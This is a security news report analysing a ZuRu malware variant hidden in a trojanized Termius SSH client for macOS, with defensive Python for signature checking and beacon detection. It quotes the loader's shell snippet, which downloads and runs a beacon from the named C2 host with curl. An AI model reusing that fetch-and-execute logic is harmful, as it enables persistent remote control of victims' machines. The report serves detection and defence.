First seen in late May 2025, the 248 MB rogue disk image looks and behaves like the genuine installer but stealthily inserts a 25 MB Mach-O binary into the Termius Helper bundle.
Once launched, the counterfeit helper runs the legitimate .Termius Helper1 to preserve normal UX while spawning a loader dubbed .localized, which drops a modified Khepri command-and-control beacon under /tmp/.fseventsd and begins polling its operator every five seconds over port 53.
Polyswarm analysts identified the sample’s C2 pattern—ctl01.macnavicat[.]com with the Baidu decoy domain—linking it to earlier ZuRu infrastructure.
Because the implant swaps Termius’s developer signature for an ad-hoc one, Gatekeeper’s trust model is sidestepped, letting the bundle execute without notarization dialogs.
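A defender's first check on a suspect Termius bundle is therefore whether its helper binary still carries the vendor's Developer ID signature or has been re-signed ad hoc. The following Python is an added example written for this report, not code from the page or from Termius: it parses the key=value lines that `codesign -dvv` prints on stderr and classifies the result. The sample outputs are constructed to mirror that format, and `EXPECTED_TEAM_ID` is a placeholder; substitute the real team identifier taken from a known-good copy of the app.

```python
import shutil
import subprocess

# Placeholder: the vendor's real Team ID is not on the page. Take it from a
# known-good install (codesign -dvv on the genuine bundle) before using this.
EXPECTED_TEAM_ID = "PLACEHOLDER_TEAM_ID"


def parse_codesign(output: str) -> dict:
    """Turn codesign -dvv key=value lines into a dict.
    Repeated Authority= lines (the certificate chain) are kept as a list."""
    info: dict = {}
    for line in output.splitlines():
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if key == "Authority":
            info.setdefault("Authority", []).append(value)
        else:
            info[key] = value
    return info


def assess_signature(info: dict, expected_team: str) -> str:
    """Classify a parsed signature: 'unsigned', 'adhoc', 'unexpected-team' or 'ok'.
    An ad-hoc signature is exactly what the ZuRu dropper substitutes, so it is
    treated as the highest-priority finding before the Team ID is even compared."""
    if not info:
        return "unsigned"
    if info.get("Signature") == "adhoc":
        return "adhoc"
    if info.get("TeamIdentifier", "not set") != expected_team:
        return "unexpected-team"
    return "ok"


def codesign_info(path: str) -> dict:
    """Run codesign on macOS; returns {} where the tool is absent (e.g. Linux)."""
    if shutil.which("codesign") is None:
        return {}
    proc = subprocess.run(["codesign", "-dvv", path], capture_output=True, text=True)
    return parse_codesign(proc.stderr)


# Constructed sample shaped like codesign -dvv output for an ad-hoc signed helper.
SAMPLE_ADHOC = """Executable=/Applications/Termius.app/Contents/Frameworks/Helper.app/Contents/MacOS/Helper
Identifier=com.example.helper
Format=bundle with Mach-O thin (arm64)
CodeDirectory v=20400 size=1234 flags=0x2(adhoc) hashes=30+7 location=embedded
Signature=adhoc
Info.plist entries=20
TeamIdentifier=not set
"""

# Constructed sample for a Developer ID signed helper (team ID ABCDE12345 is made up).
SAMPLE_DEVID = """Executable=/Applications/Termius.app/Contents/Frameworks/Helper.app/Contents/MacOS/Helper
Identifier=com.example.helper
Format=bundle with Mach-O thin (arm64)
CodeDirectory v=20400 size=1234 flags=0x10000(runtime) hashes=30+7 location=embedded
Signature size=8980
Authority=Developer ID Application: Example Corp (ABCDE12345)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=ABCDE12345
"""


def triage_sample() -> dict:
    """Classify both constructed samples; used as the worked result."""
    return {
        "adhoc_sample": assess_signature(parse_codesign(SAMPLE_ADHOC), "ABCDE12345"),
        "devid_sample": assess_signature(parse_codesign(SAMPLE_DEVID), "ABCDE12345"),
    }


if __name__ == "__main__":
    print(triage_sample())
```

On a real host, call `assess_signature(codesign_info(path), EXPECTED_TEAM_ID)` against every helper bundle inside the app; any result other than `ok` means the bundle is not the one the vendor shipped, regardless of whether Gatekeeper let it run.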
The campaign specifically targets IT staff and software engineers who favor third-party terminals, underscoring the growing risk posed by pirated or tampered productivity apps.
Beyond data theft, the enhanced beacon can transfer arbitrary files, run shell instructions, and capture output, granting operators persistent, high-fidelity control of compromised Macs.
The remainder of this report drills into the infection mechanism that makes ZuRu’s latest build both elusive and resilient.
The loader’s first task is integrity verification. It computes an MD5 hash of the resident beacon and, if the result diverges from the hard-coded checksum, silently refreshes it from the C2 before chaining execution back to the user’s session.
The logic is compact yet effective:

EXPECTED_HASH="8ac593fbe69ae93de505003eff446424"
CURRENT_HASH=$(md5 -q /tmp/.fseventsd/Khepri)
[ "$CURRENT_HASH" != "$EXPECTED_HASH" ] && curl -s http://ctl01.macnavicat.com/update -o /tmp/.fseventsd/Khepri
chmod +x /tmp/.fseventsd/Khepri && /tmp/.fseventsd/Khepri &

This self-healing step thwarts rudimentary file-based detections by ensuring the payload is always pristine.
Coupled with the five-second heartbeat and background-daemon mode toggle, ZuRu maintains low-latency access even across reboots, highlighting how a single compromised utility can cascade into full-scale network exposure for macOS-centric engineering teams.
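The same indicators the loader relies on (the hard-coded beacon checksum, the hidden drop directory, the C2 hostname, and the rigid five-second cadence over port 53) are what a defender can key on. The Python below is an added example for this report, not code from the page: it scores file observations against the published hash and path, and flags connection logs whose gaps to a single host:port are near-constant on port 53, which ordinary DNS traffic is not. The connection records are constructed, and the timestamps and resolver hostname are made up for the demonstration.

```python
import hashlib
from dataclasses import dataclass

# Indicators taken from the report.
KHEPRI_BEACON_MD5 = "8ac593fbe69ae93de505003eff446424"  # loader's hard-coded checksum
KHEPRI_DROP_DIR = "/tmp/.fseventsd"
ZURU_C2_HOST = "ctl01.macnavicat.com"
BEACON_PORT = 53
BEACON_INTERVAL_S = 5.0


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def md5_hex(data: bytes) -> str:
    """MD5 of the bytes, matching what `md5 -q` prints on macOS."""
    return hashlib.md5(data).hexdigest()


def check_file(path: str, content: bytes) -> list:
    """Flag a file that sits in the ZuRu drop directory or matches the beacon hash.
    Both rules are independent: a re-downloaded beacon keeps the hash, and a
    renamed one still lives under /tmp/.fseventsd."""
    findings = []
    if path.startswith(KHEPRI_DROP_DIR + "/"):
        findings.append(Finding("drop-path", path))
    if md5_hex(content) == KHEPRI_BEACON_MD5:
        findings.append(Finding("known-beacon-hash", path))
    return findings


def is_periodic(timestamps, period: float, jitter: float = 0.5, min_samples: int = 4) -> bool:
    """True when every gap between consecutive timestamps is within `jitter` of `period`.
    Fewer than min_samples connections is not enough evidence of a heartbeat."""
    if len(timestamps) < min_samples:
        return False
    ts = sorted(timestamps)
    gaps = [later - earlier for earlier, later in zip(ts, ts[1:])]
    return all(abs(gap - period) <= jitter for gap in gaps)


def check_connections(conns) -> list:
    """conns: iterable of (timestamp_seconds, dst_host, dst_port).
    Groups by destination, then applies the known-host rule and the
    port-53 heartbeat rule (the latter catches the beacon even if the C2 host changes)."""
    by_dst: dict = {}
    for ts, host, port in conns:
        by_dst.setdefault((host, port), []).append(ts)
    findings = []
    for (host, port), ts in by_dst.items():
        if host == ZURU_C2_HOST:
            findings.append(Finding("known-c2-host", f"{host}:{port}"))
        if port == BEACON_PORT and is_periodic(ts, BEACON_INTERVAL_S):
            findings.append(Finding("dns-port-beacon", f"{host}:{port} every ~{BEACON_INTERVAL_S:.0f}s"))
    return findings


# Constructed connection log: four beacons to the C2 at ~5 s, plus normal bursty
# lookups to a made-up resolver that must not be flagged.
SAMPLE_CONNS = [
    (0.0, ZURU_C2_HOST, 53),
    (5.1, ZURU_C2_HOST, 53),
    (10.0, ZURU_C2_HOST, 53),
    (15.2, ZURU_C2_HOST, 53),
    (0.0, "resolver.example", 53),
    (0.3, "resolver.example", 53),
    (7.0, "resolver.example", 53),
    (7.2, "resolver.example", 53),
]


def triage_sample() -> dict:
    """Run both checks over constructed inputs; returns rule names per check."""
    file_hits = check_file(KHEPRI_DROP_DIR + "/Khepri", b"constructed placeholder bytes")
    net_hits = check_connections(SAMPLE_CONNS)
    return {
        "file": sorted(f.rule for f in file_hits),
        "network": sorted(f.rule for f in net_hits),
    }


if __name__ == "__main__":
    print(triage_sample())
```

The heartbeat rule is deliberately host-agnostic: a rebuilt loader pointed at fresh infrastructure would still produce a regular cadence on a port where regular cadence is abnormal, so pairing it with the static indicators gives detection that survives the C2 domain being rotated.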
The post New ZuRu Malware Variant Weaponizes Termius SSH Client to Attack macOS Users appeared first on Cyber Security News.